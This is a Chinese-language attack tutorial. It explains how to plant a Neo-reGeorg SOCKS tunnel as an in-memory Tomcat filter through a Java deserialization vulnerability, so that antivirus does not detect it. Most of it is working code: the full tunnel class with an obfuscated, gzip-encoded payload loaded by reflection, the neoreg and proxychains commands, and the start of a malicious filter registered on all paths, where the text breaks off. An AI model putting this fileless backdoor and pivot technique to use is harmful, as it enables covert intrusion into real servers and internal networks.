• 序列化反射filter添加Neo-reGeorg内网代理


    前言:

    当被攻击服务器网络比较苛刻,可以选择通过filter添加Neo-reGeorg进行内网代理,这样做的好处首先通过反序列化漏洞,添加的filter在内存中,无文件落地可以防止杀软查杀。

    基础:

    首先我们先要了解如何使用Neo-reGeorg,Neo-reGeorg下载地址如下:

    https://github.com/L-codes/Neo-reGeorg

    首先使用Neo-reGeorg生成对应服务器代码

    python neoreg.py generate -k password

    然后将生成的jsp修改为java文件,代码如下:

    1. package com.example.seriallzpayload.service;
    2. import javax.servlet.http.HttpServletRequest;
    3. import javax.servlet.http.HttpServletResponse;
    4. import javax.servlet.ServletOutputStream;
    5. import javax.servlet.http.HttpSession;
    6. import java.io.IOException;
    7. import java.io.PrintWriter;
    8. import java.net.InetSocketAddress;
    9. import java.nio.ByteBuffer;
    10. import java.nio.channels.SocketChannel;
    11. import java.rmi.UnknownHostException;
    12. public class reGeorg_tunnel {
    13. public static java.util.Map<String,Object> namespace = new java.util.HashMap<String,Object>();
    14. public static byte[] unGzip(byte[] bytes) throws Exception{
    15. java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream();
    16. java.io.ByteArrayInputStream in = new java.io.ByteArrayInputStream(bytes);
    17. java.util.zip.GZIPInputStream ungzip = new java.util.zip.GZIPInputStream(in);
    18. byte[] buffer = new byte[256];
    19. int n;
    20. while ((n = ungzip.read(buffer)) >= 0)
    21. out.write(buffer, 0, n);
    22. return out.toByteArray();
    23. }
    24. public static Class loader(byte[] bytes) throws Exception {
    25. java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());
    26. java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100,101,102,105,110,101,67,108,97,115,115}), new Class[]{byte[].class, int.class, int.class});
    27. method.setAccessible(true);
    28. Class clazz = (Class) method.invoke(classLoader, new Object[]{bytes, new Integer(0), new Integer(bytes.length)});
    29. return clazz;
    30. }
    31. public static void Mytunnel(HttpServletRequest request, HttpServletResponse response) throws Exception{
    32. try{
    33. String charslist = "8z4lBs+92ucIAJtnON0CELaMZ5H3/eg6KDFjqPpyfxdvrSiTW1wQhbGmVkXY7UoR";
    34. Object[] args = new Object[]{
    35. request, //0
    36. response, //1
    37. charslist.toCharArray(), //2
    38. new byte[]{-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,6,-1,-1,-1,28,18,49,8,27,2,25,31,60,0,7,-1,-1,-1,-1,-1,-1,-1,12,4,19,33,20,34,54,26,11,13,32,21,23,17,16,37,51,63,45,47,61,56,48,58,59,24,-1,-1,-1,-1,-1,-1,22,53,10,42,29,40,30,52,46,35,57,3,55,15,62,38,36,44,5,14,9,43,50,41,39,1,-1,-1,-1,-1,-1},//3
    39. new Integer(200),//4
    40. new Integer(513),//5
    41. new Integer(524288),//6
    42. "n4BSI0z90MDONaJ5HhNyAhrWZaPxel/V3hDLCGb9J+VvZLPr/EAb3a1vCGq1tMPJAasIL+PuEG1a/aPyCPEvZpNTay52LpufgjJGLmfVeQJZHESxCpbN24hSnK==",//7
    43. new Integer(2047140399),//8
    44. new Integer(0),//9
    45. new Integer(0),//10
    46. new Integer(0),//11
    47. };
    48. if(namespace.get(charslist) == null){
    49. byte[] clazzBytes = unGzip(new byte[]{31,-117,8,0,-46,68,-86,100,0,3,-99,57,11,124,83,-11,-43,-25,36,-9,-26,-34,-92,-105,-110,6,46,112,91,74,75,11,88,-46,-44,42,104,-44,20,80,40,69,42,109,113,13,80,-47,57,9,-19,109,-119,-92,73,77,82,94,115,76,55,31,-101,-113,77,-25,54,7,78,69,-60,101,78,84,68,13,69,4,-15,-123,-50,-73,-50,109,78,-73,-87,123,-22,-26,-90,115,110,-50,61,-20,119,-50,125,-92,73,27,-10,-15,125,-65,31,-3,63,-50,-1,-4,-49,-5,127,-50,-71,-31,-103,79,31,58,4,0,39,58,36,15,-108,-64,27,18,-4,92,-126,123,-35,112,23,-4,66,-126,-5,120,-2,-91,4,111,122,64,-126,-73,36,120,91,-122,95,73,-16,107,15,65,127,35,-63,111,101,-8,-99,12,-65,-105,-31,29,9,-34,-11,64,25,-4,-127,-121,63,74,-16,-98,7,38,-62,27,60,-4,-55,3,110,-8,51,-81,-34,-25,-43,7,60,-4,-123,-121,15,-103,-58,95,-103,-20,71,-68,-6,-101,4,127,-9,64,21,99,-115,-125,-113,121,-8,7,15,-97,-56,-16,79,-58,-2,23,-29,-4,91,-122,-1,-56,-16,-87,4,-61,30,-104,-115,-64,3,74,-24,-16,64,0,-99,60,8,18,-118,30,-72,17,93,30,104,68,73,70,-39,-125,110,-12,72,88,-62,-77,-62,-61,56,62,41,-107,113,-68,-124,94,15,-106,-95,-113,-121,9,37,56,17,-43,18,-100,-124,-109,121,-104,34,-93,70,-36,-80,-100,73,86,-16,48,-107,-73,-107,60,76,35,89,-80,-54,-125,-43,56,-99,6,18,-111,-122,79,24,-91,-90,4,107,113,70,9,-50,68,85,-58,89,-116,117,-100,-116,117,124,50,91,70,63,-49,-11,60,4,120,104,-112,-15,120,9,27,61,-80,-110,76,-124,39,-32,-119,-76,-62,57,-68,125,95,-58,-71,100,17,60,-119,9,-100,44,99,80,-58,83,120,127,-86,7,98,120,26,15,33,9,-101,60,-80,22,-25,121,112,62,46,96,-56,-23,-28,33,60,-125,-39,47,-108,113,-111,-116,-51,50,46,-26,93,-117,-124,75,8,9,62,-31,-51,-103,50,46,-11,96,43,-98,-59,55,-106,-15,-86,-51,-125,-19,-40,-63,-100,-105,-53,120,54,67,62,-61,67,39,15,97,-58,90,33,-31,74,15,108,97,47,110,-63,85,50,118,-15,124,-114,-116,-85,25,-8,62,95,60,-105,-121,-13,100,-4,44,75,123,62,15,-97,99,-105,92,-32,-127,-85,112,77,9,-100,-122,17,30,-42,74,-40,-51,-112,30,9,117,9,123,61,112,13,-10,49,-18,58,9,-93,30,-72,-114,99,-29,58,-68,-112,-121,-11,108,-31,24,15,-3,60,-60,37,76,80,64,-30,0,-69,-12,34,55,-103,33,41,97,-54,13,55,-15,-100,118,-61,-51,-104,100,-76,65,62,-34,-32,-63,-115,-72,-119,-121,-51,60,108,-111,-16,-13,30,-40,-59,-78,-17,-62,-117,121,-8,-126,-124,91,37,-4,-94,7,-18,-92,0,-57,75,36,-68,84,-62,47,33,56,-12,56,13,-25,53,-45,-48,-93,-13,106,17,-126,-100,-46,83,-87,104,34,-98,66,24,-33,118,97,100,67,-92,113,48,29,-115,53,-74,71,6,-102,16,-36,-31,104,95,60,-110,30,76,18,-10,-55,-123,-89,-13,-52,109,44,18,-17,107,12,-89,-109,-47,120,95,83,30,100,-7,-38,11,-11,-18,116,-45,2,-94,-31,-102,23,-115,71,-45,11,16,-100,117,-77,87,33,8,-51,9,-26,-19,-46,47,26,-116,-60,-120,-87,90,55,-10,-38,-20,115,17,-60,-75,-63,-109,88,-36,73,117,-25,45,-102,61,-106,-105,-119,-64,-108,38,-43,-115,61,-99,-51,-102,-71,-41,-23,-111,30,61,-71,94,-33,-116,48,-85,24,82,49,-86,-98,-106,77,-35,-6,64,-38,52,-120,20,77,-59,18,-35,-111,-40,40,41,-19,-5,36,-91,103,109,108,-61,5,61,122,-73,-95,-109,-97,68,-51,67,107,-115,-89,-11,62,61,73,-62,-116,-43,-48,-70,-87,-57,115,55,-57,-30,20,37,69,122,41,-47,-8,-122,-60,122,-67,93,79,-81,75,-12,32,44,43,98,-64,-79,-62,22,-95,63,-69,-104,88,-29,-14,-119,-49,65,56,-1,-1,76,-67,57,22,73,-91,-114,-103,-97,59,25,-119,-9,44,-38,-100,-42,-55,-36,-82,-70,-42,86,67,67,-49,90,6,-84,72,-112,-38,-28,103,14,-128,86,2,70,-29,-23,21,9,11,85,-84,51,49,93,27,-12,100,-76,-105,28,-36,88,-60,65,6,100,83,99,92,79,55,-90,82,-79,-58,112,-72,45,108,-58,-70,-31,58,95,-9,58,-67,123,125,115,44,-86,19,-35,-28,96,42,-83,-109,49,67,-74,35,82,122,-9,96,50,-102,-34,-36,-40,-83,39,-45,-115,-25,-100,124,-62,105,-51,-76,-120,-10,70,-69,35,105,-67,-120,5,102,-81,-110,-16,-53,54,-47,-80,-98,36,-71,114,68,125,125,122,122,97,55,-121,-107,-34,-45,-102,74,13,-22,73,-46,-32,-72,-70,-39,-57,-60,-118,94,-24,-68,-18,-104,-15,-124,20,-56,-62,62,-124,9,69,108,-85,-64,61,112,-81,2,123,-32,62,-124,-78,49,113,-93,-32,101,120,57,-126,119,-76,-44,100,126,18,-83,-117,-104,-21,-55,-126,99,-109,-86,2,79,-61,15,17,74,13,120,52,-47,104,35,2,-31,-46,-67,-26,4,81,-113,-89,-37,-12,120,95,122,29,-95,17,-88,53,62,48,-104,38,-38,122,-92,-97,-28,-76,-17,-27,65,21,-68,2,47,87,-16,74,120,17,97,-14,104,113,22,13,70,99,61,44,-19,87,-16,-85,-92,43,94,-91,-32,-43,120,-115,-126,-41,-30,-41,20,-4,58,-33,-69,22,-81,83,-32,32,28,82,-16,122,-4,-122,2,79,-64,-109,54,27,-125,76,-18,-19,42,120,3,126,83,-63,111,-63,62,5,-65,-51,54,19,86,116,-82,108,81,-16,70,-4,-114,2,-113,-63,-29,20,64,73,61,-91,-89,77,3,-40,47,73,49,40,113,-72,-84,-20,108,99,1,-120,-60,54,-36,-114,80,-98,59,88,-102,78,15,-48,33,-87,30,39,3,25,-100,110,98,-76,-17,-30,-51,8,-43,-123,-15,-58,-72,-87,81,-56,-73,-64,67,10,-34,-118,59,40,27,82,56,74,120,-101,-126,59,-15,118,-117,-61,-56,85,35,116,-38,35,-15,-120,-31,-68,93,120,-121,-126,-33,-61,-116,-126,-33,-57,59,77,67,47,53,82,91,71,-92,-97,31,-125,106,-120,103,36,-26,-106,-8,96,-65,-98,-116,48,51,9,127,-96,-32,93,-72,91,-63,-69,-15,30,9,-17,85,112,15,-34,39,-31,94,5,-17,-57,7,20,124,16,-77,-90,-10,38,41,5,30,-127,-61,10,-18,-61,33,5,-9,-29,67,10,28,-127,-89,20,56,0,15,43,120,0,31,-106,-16,32,-101,-108,-20,-2,8,30,-106,-16,81,5,31,-61,-57,37,124,-126,-124,-79,-94,-96,-63,12,3,5,-97,100,-21,-106,-83,-96,103,-99,-22,-43,-109,13,45,-100,-31,-56,-73,10,30,-127,-61,-60,48,-107,99,-120,79,-111,71,-31,29,124,90,-63,31,-30,-45,-26,81,56,77,-59,-122,52,-86,-76,67,-121,-97,-5,-62,100,50,-78,121,-7,96,58,23,68,18,62,-93,-32,-77,-8,28,-117,116,21,93,-116,-12,-12,-40,52,-81,-90,0,-63,-25,-15,26,-124,18,-61,-63,-117,6,123,123,57,100,-91,-26,-27,29,29,45,-51,43,20,124,-127,66,0,95,-60,-105,20,124,25,95,-55,119,109,43,13,-31,68,-9,122,122,-85,61,61,116,57,-59,17,-16,35,9,95,85,-16,-57,-8,19,5,127,-118,-81,41,-80,23,-18,87,-16,103,-8,58,21,-49,-27,-53,40,-84,-106,44,108,109,-93,-44,-76,-72,53,-100,99,-16,6,-2,28,-95,-54,36,75,26,116,-81,-117,-112,-5,99,-87,70,-109,118,-77,-71,85,-16,23,-116,38,116,-74,44,92,44,-31,47,21,124,19,-33,-94,103,-127,111,43,-8,43,54,-9,-81,21,-4,13,-2,86,-63,-33,-31,-61,36,-4,-110,-27,-99,93,11,59,23,51,-25,-33,43,-8,14,31,-68,-53,62,-68,1,-33,-90,-6,55,-10,25,-79,-50,-4,-118,-2,64,98,-50,-97,-49,-85,63,34,-32,124,86,-24,61,-66,-11,30,-19,26,20,-4,19,-2,89,-63,-9,-7,-123,125,-64,-61,95,-16,67,5,-1,-54,116,63,-30,-40,-48,114,-106,-23,-48,-45,27,19,-55,-11,-100,76,-110,-67,-111,110,93,-63,-65,-31,-121,8,19,11,76,103,25,-51,-114,70,27,124,-110,109,76,-4,59,-15,-128,-3,-16,16,-62,-44,49,-34,45,-56,16,87,26,25,2,63,86,-32,5,120,81,-127,-25,-32,121,5,94,-126,-105,-87,63,25,85,100,20,-4,7,126,-94,-32,63,-15,95,10,-2,27,-1,99,103,42,3,-95,45,-63,-23,45,-17,70,120,93,34,73,25,-19,25,120,86,-127,79,-15,83,9,-121,21,7,-112,-78,14,-60,-101,21,-121,-61,-31,-76,19,-96,-15,-114,58,-87,42,37,-6,21,-121,-32,16,21,-121,-117,-93,-84,-26,127,-49,-43,118,-22,53,40,44,-115,-92,-42,81,-101,68,-63,-47,-95,39,-110,-6,-103,52,-112,64,-45,70,-91,-120,68,42,29,-89,71,-68,-118,-85,88,-108,3,117,20,2,115,-56,79,6,84,55,-118,-56,-111,39,67,46,5,82,-35,-96,-126,-71,42,18,27,-44,-115,-42,-85,-107,31,-54,-122,72,52,22,89,27,35,-120,64,-74,-90,-108,-25,-118,12,12,-24,113,90,52,28,83,-125,100,101,-24,38,-85,42,83,59,39,-89,19,118,45,-103,88,87,-76,-93,114,-89,6,-41,-90,44,-108,73,92,-31,-117,33,-71,98,86,21,81,-21,-118,35,72,27,88,-109,-27,-67,6,-115,124,12,-69,53,34,-111,54,114,125,58,74,-81,70,-94,-118,-67,-79,-63,20,-79,16,-69,99,-119,20,-31,-71,-69,19,-3,3,-111,-92,-66,34,113,-108,59,100,-78,-46,4,-103,103,36,-127,83,-66,-80,-107,-76,-54,-60,-56,25,73,-32,-91,-116,-45,73,-115,-83,-98,-54,-43,-108,18,2,45,78,-104,-39,-117,-84,94,119,46,75,-30,-119,-90,90,-29,-87,116,36,-34,77,98,76,-32,-108,56,38,14,106,-21,70,117,47,-93,81,12,-107,-90,20,-30,80,73,49,-46,-15,38,98,85,98,-108,99,-101,-55,-15,71,117,111,-79,-37,-92,-118,-64,29,7,66,-105,-43,15,-115,96,45,-45,55,91,-79,-40,52,-6,40,63,80,-101,70,-11,54,97,94,-24,-26,-77,50,68,-25,14,-62,76,-119,75,34,-35,-23,68,-110,122,-72,-102,-70,34,34,21,-32,52,-103,-26,26,13,46,98,-82,49,55,-103,103,94,-95,108,78,-60,98,-90,-33,40,101,9,-79,104,42,61,98,-92,-47,-107,-44,126,8,6,-36,-56,87,109,-124,-49,65,-103,-44,-87,-49,-29,88,-102,-112,127,-43,56,101,126,-91,-123,48,126,-110,105,-90,-103,72,114,24,-25,83,109,-75,-32,68,-44,55,22,74,-100,-42,69,82,29,-122,95,-23,41,83,-13,42,-60,-115,77,-31,-109,-53,53,-43,-66,-111,56,60,59,73,17,-100,76,111,-26,-122,-13,40,29,-14,-104,-121,50,-98,92,-109,95,111,41,-50,108,62,-108,-76,-13,79,-72,59,37,100,-85,41,23,-22,-116,-98,124,98,49,76,82,-127,50,6,-67,126,-117,-66,89,-80,-105,68,-11,88,15,-35,44,43,48,-122,-7,-19,57,-82,0,64,41,-126,62,-28,-62,-36,-78,21,34,19,-88,16,-39,-64,-15,-102,-97,-105,-83,125,113,-54,-67,-51,17,118,81,105,33,87,83,-116,78,61,53,64,33,-96,-101,31,-91,-109,-13,-44,-52,43,73,77,-26,-27,-106,100,50,-111,-76,-75,-55,-17,-91,55,83,-101,-33,-49,-23,-107,67,-93,59,49,-80,-103,63,-24,-58,-6,-91,-75,8,-56,-80,-121,64,-90,-89,-5,50,37,-93,-108,110,124,-13,8,-100,118,56,-86,-19,100,115,-44,70,-126,115,103,-54,0,112,16,-26,-27,38,19,-85,-87,-8,-9,-79,-23,-122,81,-72,-28,-94,110,51,-101,81,-119,-82,27,77,-55,-86,-29,-26,-43,50,66,-20,-115,-10,-47,-117,94,68,31,-56,-21,-115,-36,94,71,-71,-83,-104,-76,58,-65,51,46,58,35,18,59,-115,100,120,-22,127,-1,-76,-4,111,95,-115,-50,62,22,119,86,17,2,69,-47,93,73,-67,63,-79,65,-73,-65,21,-30,86,-21,97,55,-121,114,36,-58,-97,-7,92,59,-90,-28,-118,75,33,82,19,31,21,61,-32,42,33,26,-98,-49,89,-108,17,44,-46,84,107,-12,72,50,-33,53,-71,67,34,89,-110,78,-28,90,32,106,-72,70,126,-23,24,-61,92,-24,-115,69,-23,13,40,-108,6,58,-11,-2,8,37,103,54,121,69,93,115,-79,26,109,-35,9,28,99,73,-73,89,-44,25,-82,21,83,3,49,-50,-4,-59,-46,69,-63,47,25,-71,-46,76,90,-84,-92,46,34,105,62,51,-87,-49,44,103,-108,7,104,53,-70,117,76,-79,-102,-7,-49,55,63,-51,-110,1,73,-65,118,122,-79,45,49,-67,-97,62,42,8,-69,-124,19,-99,-75,53,-117,70,94,-77,-55,-28,74,45,126,-71,-2,-45,-54,51,-83,102,106,50,26,-59,60,-5,-113,116,-113,92,-81,-93,-87,-123,-87,20,-1,-60,69,-31,-71,36,-103,-24,-25,-116,58,6,-49,-56,-73,43,86,-97,-35,66,113,95,-124,-56,25,69,12,53,-10,-9,-112,124,-10,73,-67,-105,-33,68,-93,-39,35,52,89,101,-68,-40,25,-1,-40,-109,-30,-97,14,72,74,-93,109,27,-105,50,127,74,-80,-9,46,-13,-25,26,-124,-45,-118,-68,-123,99,-3,13,70,98,27,-101,121,-89,-50,48,-100,-101,1,70,82,-121,-23,112,23,-108,-128,3,118,-61,-35,-32,-92,-7,30,-72,23,-128,-26,61,112,31,-51,110,-2,32,2,-124,7,12,-40,-125,-32,-93,117,22,-10,-47,56,68,-112,50,-102,-111,102,-47,79,16,70,-25,95,14,-24,11,-64,60,118,-67,5,46,56,-114,-26,-117,-21,15,-125,-125,-2,-75,7,-100,115,58,2,-62,-100,-112,-32,15,-120,115,14,-125,-109,-2,61,8,-76,113,-47,70,-92,127,15,-126,43,32,-47,90,-54,-126,28,20,3,-78,-67,116,5,-68,46,123,45,5,-68,-116,-30,14,-55,1,111,14,-63,29,-16,-70,-19,-75,39,-32,-11,-40,-21,-110,-128,-73,-60,94,43,66,112,-100,24,44,117,5,-57,75,65,-81,28,44,-13,-70,-126,62,-81,20,-100,64,-21,-119,94,119,80,-43,4,-97,-57,121,16,74,-122,64,57,12,-29,66,-109,-68,117,-76,9,77,54,-89,41,-66,-46,-112,70,127,-27,13,-66,-15,57,36,-55,-92,-20,-72,21,-18,-94,-93,-118,6,-97,55,119,84,22,-102,-86,77,-51,-126,47,88,-87,86,58,118,-128,43,3,-89,-88,-107,15,-53,-95,105,-38,84,109,90,22,38,-104,-80,-38,3,48,113,-11,62,80,-75,-118,44,76,58,0,-18,-43,-38,-76,125,48,-103,-42,89,-104,18,-86,-56,12,63,-94,122,-124,29,16,-46,42,-100,106,73,22,-76,-112,-90,85,48,106,-71,-86,-12,24,51,-61,-54,-75,10,62,-84,8,-47,-111,-45,62,-27,-125,10,63,-17,-90,-122,42,-75,74,-43,61,4,-107,67,48,45,52,57,99,32,78,-30,-109,-22,44,76,-41,-120,83,13,15,-75,-50,-35,-38,100,117,-94,97,88,34,116,-60,113,5,109,85,99,75,-118,-8,102,100,97,-26,54,80,12,-118,-77,-74,59,-94,-116,-117,97,70,-95,81,-16,29,103,-23,-35,-43,-32,-85,-53,-103,-64,29,-86,60,0,-77,87,107,21,-5,-64,79,122,-109,-42,20,6,-127,80,-107,86,-91,85,102,-95,65,-85,18,-78,112,-68,-81,81,-85,-54,-62,9,-37,-128,-26,-61,-48,-24,-49,-62,-119,-66,57,67,48,55,84,-83,85,-93,112,16,78,90,-19,-12,-121,49,11,39,27,-57,26,-55,28,-52,-62,41,13,-66,83,115,108,78,99,-44,33,8,-123,-90,107,-45,-121,-96,73,-101,-66,31,-26,33,-124,106,-76,-102,-3,48,31,97,27,-52,-31,-43,2,4,-106,-88,-74,-63,119,58,81,45,89,-19,-44,106,-61,-106,-108,51,72,-96,-38,33,56,67,35,37,23,102,-122,-97,41,-18,-31,21,44,-25,-94,80,77,6,-92,16,25,-53,118,-100,70,-50,-14,-109,29,76,3,55,103,97,49,1,-76,114,-53,-123,-75,90,109,22,90,-120,67,-115,54,-61,-87,-51,56,-108,-123,37,90,77,22,-50,-28,97,41,19,108,-35,15,103,-15,-117,89,86,32,-15,89,-7,18,107,-75,71,32,-88,-43,-6,-38,-78,-48,-66,29,2,-76,-22,48,86,53,44,118,22,-106,19,117,-63,119,-74,104,43,-75,90,-48,102,-80,102,93,-103,-31,-67,-52,-31,51,101,120,-35,78,24,-57,-53,78,-106,126,38,-81,-62,-52,-20,41,-48,-24,-26,10,-45,28,-86,72,10,24,-9,-100,-69,-53,4,-96,72,-99,113,0,86,-110,-118,-85,66,51,89,122,10,-39,-43,-63,90,-78,-61,52,-75,-106,14,103,-79,62,-77,-100,42,-39,-83,75,-101,-87,-51,-54,-62,57,-103,-31,-41,-75,-103,89,88,77,103,-126,-17,92,83,30,95,27,-53,67,-89,-27,67,112,-98,65,125,-124,-93,33,-100,-51,-108,34,-110,-80,62,59,58,34,5,-33,-7,118,100,21,19,-107,-20,94,106,-121,-24,17,-4,-104,-74,-29,-115,109,37,69,-20,-25,40,98,-73,3,7,-86,-49,-128,77,-93,-43,4,94,13,-63,5,-63,-86,33,88,-61,97,-109,-123,-56,1,88,75,-81,78,-83,-38,7,-35,101,37,67,89,-24,-47,-86,-99,89,-48,-69,-10,66,-81,86,-87,85,-17,-121,62,39,-87,56,69,-11,-6,-42,-123,51,-104,34,58,-68,-114,-122,105,42,-29,-104,-82,38,-24,-7,-60,-17,66,-125,95,-125,113,109,63,-84,119,-112,-13,98,102,-44,71,-78,-48,-97,1,49,84,101,-99,-59,29,-48,-107,-63,-39,116,39,97,-36,-71,107,-52,-99,35,-80,81,117,13,-63,0,-67,-107,105,108,-90,-117,-126,-43,-86,20,-100,-18,12,-42,-40,62,-87,85,-85,111,-127,78,-75,-102,-3,-60,24,73,-118,46,-89,90,-51,-34,-88,101,103,-99,-61,-64,84,-105,90,-93,86,-81,9,-46,-96,-70,110,3,15,-19,-90,-33,6,94,-110,124,28,71,78,58,-100,-127,-15,57,6,-103,-31,123,109,45,97,18,49,-50,-45,-78,-54,-48,18,54,-110,-60,-125,-122,-60,-3,-93,37,-98,-84,-114,-77,50,56,63,-17,67,44,58,89,-105,47,110,-24,98,43,111,52,-58,77,-37,-96,-108,-8,-47,106,51,69,-25,7,57,118,-45,-118,-80,-77,13,-89,-47,-21,-102,82,-16,-70,-14,34,36,3,85,-102,-111,54,-3,-102,76,-103,-50,72,-99,5,-57,66,-69,115,55,21,-73,103,-15,42,-68,22,-86,28,79,56,-98,117,-68,0,85,-62,22,-31,41,-31,25,-102,63,17,81,20,-96,74,108,16,-17,22,-9,-48,-4,-90,107,-86,-85,10,-86,-88,-120,-19,114,109,-122,42,-68,-61,-15,50,-49,-114,87,-100,119,-13,-20,-68,71,8,-14,44,-100,-30,-38,-64,-77,81,-19,14,-64,-61,102,-75,-61,73,32,-126,76,-77,-25,0,108,33,39,125,-66,-67,-2,-48,2,103,80,80,-123,-54,-99,-16,81,-67,42,92,38,-32,-36,50,24,-34,26,20,9,-76,3,-22,3,-2,7,64,80,69,-15,-30,-109,-78,112,113,-105,-75,115,109,-107,54,-103,123,-33,23,-78,-80,-75,43,3,-5,-13,-81,-70,-116,-85,45,71,-67,-86,-70,-54,-32,-125,-83,-46,-59,-105,-28,29,-72,-68,-29,-73,-118,54,-47,47,-102,68,123,-14,-119,74,-1,15,114,-86,84,6,-121,-73,122,93,5,71,-110,-9,-12,-83,-58,54,51,-84,4,-78,112,-55,30,-85,35,56,8,-121,44,27,-7,64,0,15,-51,-82,122,-54,-117,-19,-127,67,11,56,-96,43,-9,-63,-91,33,-63,73,118,17,-55,84,-17,16,41,87,64,21,47,19,113,-18,92,82,-104,97,110,-43,-27,-72,117,-8,93,26,-115,-78,-7,100,1,-118,100,-95,72,6,-118,100,-94,-20,-44,72,82,22,-45,123,2,-53,-97,-123,47,89,-8,65,89,-107,-67,-13,119,-128,91,-93,-14,-109,-34,-61,-108,84,-103,-95,38,17,74,-11,-61,-81,-47,104,16,57,95,99,-99,-58,-77,33,100,-17,-68,-83,98,1,29,-73,-22,30,77,-57,-51,80,-109,-114,-37,-96,-29,54,-23,80,107,-95,-54,46,-78,-42,38,-43,-51,36,50,-61,83,-52,91,-122,125,100,-2,97,-98,-102,43,110,-88,82,100,31,23,-51,125,-66,-46,54,-65,-17,-53,89,-72,-116,-115,100,71,-47,-46,-128,74,-51,-109,104,-43,-98,122,-82,52,-94,-109,8,81,17,-70,-36,-40,-48,-70,-62,44,61,109,121,72,76,-57,-128,-111,-57,51,-61,67,-11,78,2,-106,11,-36,35,-104,2,60,74,127,2,57,-120,3,-6,49,120,-36,18,101,61,117,-125,18,-51,23,112,17,-81,-89,26,-98,-123,43,-38,-121,-32,-54,-114,-122,-3,-16,21,-82,82,103,-46,-30,-85,92,-92,-82,10,9,-84,-50,-43,33,81,19,-83,-77,58,94,25,-121,-41,-124,92,-102,-21,81,-72,118,27,-108,105,-82,44,124,-115,-30,-30,-21,-37,64,20,118,103,-122,95,-51,12,103,-23,125,22,-118,-32,-26,-1,-13,-79,-38,-53,107,-23,69,81,-76,-64,-91,70,15,-42,-18,92,-32,63,20,20,36,-54,121,-82,3,112,-35,106,-22,57,-81,15,73,-107,-86,-80,19,34,26,85,-23,111,4,69,77,-46,92,78,-51,69,117,-10,-122,46,-115,50,-24,55,73,83,-71,-121,93,78,-105,-36,116,-22,118,106,110,-29,-76,-110,96,107,-42,44,80,69,97,23,53,76,-94,-41,125,59,76,32,-49,26,61,-104,-101,18,9,-91,37,55,-19,53,119,56,51,124,107,-64,-76,-109,-101,-1,-53,-60,18,-19,106,18,-105,-83,-77,-47,-17,-108,-67,19,-121,-32,91,97,-65,-9,56,107,101,37,105,-110,-73,-46,127,104,39,116,-6,43,-25,28,-127,37,52,-78,-99,30,5,-9,54,-54,-63,2,85,34,110,13,-60,12,-43,102,-63,-54,-99,98,-96,-110,3,76,19,15,-79,-36,107,-122,-32,-37,-108,-55,105,-53,-43,-107,-114,93,-105,57,-55,127,-9,4,-116,-56,65,-24,-124,62,-72,-48,112,-102,-101,-1,27,-49,114,91,-52,-118,-96,53,-127,67,7,-31,-58,14,35,116,2,36,-59,50,-114,-99,44,124,39,36,-6,36,-90,-72,109,27,-108,-20,-123,-19,44,-64,12,-33,77,35,-112,-17,50,-60,-25,-69,-39,-126,-56,123,-31,-106,-112,-40,-96,10,-102,24,54,-62,-25,1,127,125,67,96,8,110,29,29,58,110,-2,-31,-35,-110,-31,68,10,29,-106,97,-90,-97,25,-110,-46,-11,36,-13,14,14,-113,44,-36,-74,-99,-98,12,7,-22,78,77,-12,55,100,-31,-10,-79,-124,-98,-125,-25,45,43,31,79,-124,68,-102,-87,-18,-19,34,-109,-34,-47,30,-88,40,-17,17,-42,100,-31,123,-27,107,22,112,59,45,4,56,-14,50,-102,96,123,-24,5,120,-47,-70,123,-118,-15,53,3,80,-17,119,25,105,-50,47,26,-109,87,-34,116,-119,95,48,-105,94,90,58,-51,-27,-108,77,-105,-52,-85,-40,109,17,121,9,94,-74,-120,-100,78,66,49,-111,-71,20,117,109,-11,-82,114,-58,-67,126,69,-67,88,-18,-107,-73,88,107,-95,-36,-21,-75,-41,-50,114,-17,20,123,109,39,-65,87,-32,71,22,-79,82,-102,-99,52,59,-124,-35,-42,-39,-85,-16,99,-53,100,-29,-24,-113,-49,-84,-81,40,-37,28,63,-95,-65,-97,30,11,-46,107,-16,-77,-47,-33,100,-44,57,125,-33,-50,48,-81,-25,62,-39,38,27,-6,0,-108,28,-128,59,-55,-92,63,-72,31,122,77,106,-16,63,-22,-91,95,93,55,37,0,0});
    50. Class clazz = loader(clazzBytes);
    51. namespace.put(charslist, clazz.newInstance());
    52. }
    53. namespace.get(charslist).equals(args);
    54. }catch (Exception e) {
    55. e.printStackTrace();
    56. }
    57. }
    58. }

    运行后然后使用访问,确定代理是否成功:

    python neoreg.py -u http://192.168.4.147:8081/reGeorgtunnel -k galaxy -p 1234 -l 192.168.4.147

    可以看到代理成功: 

    下面进行代理测试是否成功,首先我们在本地通过python 搭建个简单服务器:

    python -m http.server --bind 127.0.0.1 8811

    然后在kali中使用proxychains进行访问,首先设置proxychains:

    vi /etc/proxychains4.conf

    Neo-reGeorg使用的是sock5协议,其他协议会报错,需要注意

    然后使用kali通过代理访问本地通过python搭建的简单服务器,如果能访问则整个代理成功:

    proxychains curl http://127.0.0.1:8811

    访问成功,证明修改代码无问题,下面就对代码进行修改,实现添加filter进行访问:

    添加filter访问:

    这里我们可以使用之前加密的版本,也可以使用其中的NeoreGeorg.java来进行开发,这里我使用了NeoreGeorg.java进行编写,针对源码修改这样便于二次修改,当然也可以用加密的版本:

    1. package com.example.seriallzpayload.service;
    2. import org.apache.catalina.Context;
    3. import org.apache.catalina.core.ApplicationFilterConfig;
    4. import org.apache.catalina.core.StandardContext;
    5. import org.apache.catalina.loader.WebappClassLoaderBase;
    6. import org.apache.tomcat.util.descriptor.web.FilterDef;
    7. import org.apache.tomcat.util.descriptor.web.FilterMap;
    8. import javax.net.ssl.*;
    9. import javax.servlet.*;
    10. import java.io.*;
    11. import java.lang.reflect.Constructor;
    12. import java.lang.reflect.Field;
    13. import java.lang.reflect.Method;
    14. import java.net.*;
    15. import java.nio.ByteBuffer;
    16. import java.nio.channels.SocketChannel;
    17. import java.security.cert.CertificateException;
    18. import java.security.cert.X509Certificate;
    19. import java.util.*;
    20. public class FilterReGorg implements Filter, HostnameVerifier, X509TrustManager {
    21. private char[] en;
    22. private byte[] de;
    23. public static java.util.Map<String,Object> sessions = new java.util.HashMap<String,Object>();
    24. static {
    25. try {
    26. final String name = "evil";
    27. final String URLPattern = "/*";
